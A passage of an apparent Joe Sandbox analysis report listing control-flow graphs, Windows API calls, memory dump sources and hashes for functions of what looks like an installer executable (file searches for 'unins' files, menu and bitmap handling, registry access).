1875->1920 1924 423ef2-423ef8 call 41eea4 1876->1924 1925 423f06-423f0e call 423a84 1876->1925 1878->1813 1921 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1921 1879->1866 1880->1813 1882->1813 1883->1813 1884->1866 1885->1813 1890 423f64-423f6b 1885->1890 1890->1813 1907 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1907 1891->1813 1892->1866 1893->1813 1908 423d9f-423da4 call 422c4c 1893->1908 1899->1813 1900->1813 1905->1813 1906->1813 1907->1813 1936 423f86-423f9c call 412310 1907->1936 1908->1813 1914->1813 1919->1813 1920->1919 1921->1813 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1921->1942 1940 423efd-423f00 1924->1940 1925->1813 1936->1813 1945 423fa2-423fac 1936->1945 1940->1925 1942->1813 1945->1813
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                                            • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                                            • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                                            • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004673A4 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1649windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                                              • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                                              • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                              • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                              • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                                              • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                              • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                              • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                                              • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                                              • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                                              • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021D0BD4,021D2934,?,?,021D2964,?,?,021D29B4,?), ref: 004683FD
                                                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                                              • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                                            • String ID: $(Default)$STOPIMAGE$%H
                                                                                                                            • API String ID: 3231140908-2624782221
                                                                                                                            • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                            • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                                            • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                            • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00474F88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID: unins$unins???.*
                                                                                                                            • API String ID: 3541575487-1009660736
                                                                                                                            • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                            • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                                            • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                            • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452A60 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 873889042-0
                                                                                                                            • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                            • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                                            • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                            • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408568 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                            • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                                            • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                            • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423B84 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                            • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                                            • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                            • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045559C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2645101109-0
                                                                                                                            • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                            • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                                            • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                            • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042F520 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                            • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                                            • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                            • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F058 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 899 46f2e4-46f309 call 40b24c call 46ee44 895->899 900 46f2a5-46f2e3 call 46ee44 * 3 895->900 919 46f30b-46f316 call 47c26c 899->919 920 46f318-46f321 call 403494 899->920 900->899 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f59c call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1031 46f5a1 1017->1031 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1031->1016 1042 46f67d 1032->1042 1033->1032 1035 46f659-46f65d 1033->1035 1035->1020 1035->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 